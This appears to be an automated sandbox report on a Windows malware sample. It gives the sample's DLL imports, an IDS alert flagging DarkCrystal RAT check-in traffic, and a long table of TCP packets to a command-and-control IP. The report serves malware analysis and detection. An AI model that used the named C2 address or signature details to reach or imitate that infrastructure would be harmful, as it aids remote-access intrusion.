KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-28T20:42:32.204312+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49734 | 104.21.38.84 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Dec 28, 2024 20:42:45.527340889 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.527357101 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.527369976 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.545165062 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.757791042 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.764389038 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:45.883986950 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.884325027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.242917061 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.299498081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.300417900 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.313863039 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.420891047 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.497098923 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.610361099 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.633831978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.634027958 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.756087065 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.756171942 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.778855085 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.779594898 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.898893118 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.898964882 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.899084091 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.899149895 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.899283886 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:47.018821955 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.254412889 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:47.374166965 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.374177933 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.374248981 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.458699942 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.469841003 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:47.589572906 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.802097082 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.804049015 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:47.924880981 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.924899101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.030553102 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.110450029 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.271955967 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.313570976 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.329431057 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.331284046 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.450962067 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.663532972 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.663861990 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.750056028 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.750890970 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.783620119 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.783629894 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.870090008 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.870160103 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.870358944 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.870515108 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.870582104 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.990371943 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.192925930 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.197416067 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:49.236679077 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:49.317003965 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.356343031 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.356374025 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.356410980 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.529613972 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.529795885 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:49.649566889 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.649746895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.096729040 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.096831083 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.105993032 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:50.177018881 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:50.225493908 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.243901968 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.297880888 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:50.446816921 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.447922945 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:50.567424059 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.567512989 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.974180937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.977061987 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.054970026 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.055728912 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.096560001 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.176217079 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.176279068 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.176282883 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.176343918 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.176445961 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.296390057 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.309544086 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.309731960 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.429727077 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.429862976 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.532787085 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.653573036 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.653641939 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.653724909 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.839319944 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.840102911 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.959878922 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.172853947 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.173199892 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:52.293410063 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.293420076 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.354885101 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.500976086 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:52.642426014 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.755523920 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.756329060 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:52.797856092 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:52.875873089 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.089735031 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.117301941 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.237962008 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.238018036 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.645412922 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.646351099 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.651767969 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.653045893 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.766061068 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.771752119 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.771857977 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.772666931 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.772785902 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.772964001 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.892482996 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.978924990 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.979201078 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:54.098767042 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.098947048 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.169359922 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:54.289032936 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.289051056 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.289061069 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.512942076 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.517021894 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:54.636589050 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.849379063 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.849544048 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:54.949637890 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.969036102 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.969137907 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.000993967 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.205137014 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.289791107 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.376430035 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.382090092 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.446764946 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.447519064 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.501585960 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.566695929 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.566752911 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.567004919 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.567076921 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.567270041 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.687200069 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.714809895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.714973927 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.834543943 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.834562063 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.242290974 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.292149067 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:56.340473890 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:56.411681890 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.411691904 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.411717892 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.460205078 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.673288107 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.673485994 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:56.698996067 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.794821024 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.794830084 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.813476086 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:56.944691896 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.016608000 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:57.203892946 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.205617905 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:57.329222918 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.543379068 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.543543100 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:57.663077116 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.663206100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.999330997 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.001964092 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.068196058 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.070643902 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.119132996 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.119189024 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.121654034 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.121720076 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.121887922 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.191385984 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.242897987 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.403475046 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.403667927 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.469822884 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.523233891 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.523334026 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.589454889 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.589469910 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.589483976 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050681114 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050689936 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050734043 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050780058 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050827980 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050836086 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050873041 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050882101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051063061 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051070929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051078081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051088095 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051095963 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051104069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051171064 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051179886 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051188946 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051198006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051296949 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051305056 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051309109 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051321983 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051330090 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051419973 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051472902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051529884 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051538944 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051614046 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051624060 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051682949 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051696062 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051742077 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051750898 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051800966 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051883936 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051892996 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051901102 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051913977 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051965952 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.052010059 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.052020073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.052067041 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.052074909 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.361829042 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.500996113 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:04.608669996 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.735275030 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:04.736440897 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.110379934 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.117187977 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.117682934 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.409811020 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.409888029 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.410176992 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.410290003 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.410341978 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.411084890 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.532040119 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.567037106 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.567343950 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.686995029 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.766735077 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.889121056 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.889132023 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.889158964 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.899681091 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.899828911 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.019500971 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.019686937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.438407898 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.439766884 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.497085094 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.559433937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.618766069 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.741935015 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.773401022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.777132988 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.785216093 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.886531115 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.890177965 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.896770954 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.896811008 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.006392002 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.009846926 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.010158062 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.010247946 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.010354996 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.129734993 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.302690029 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.303625107 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.360524893 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.423070908 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.480144978 CET8049762104.21.38.84192.168.2.4
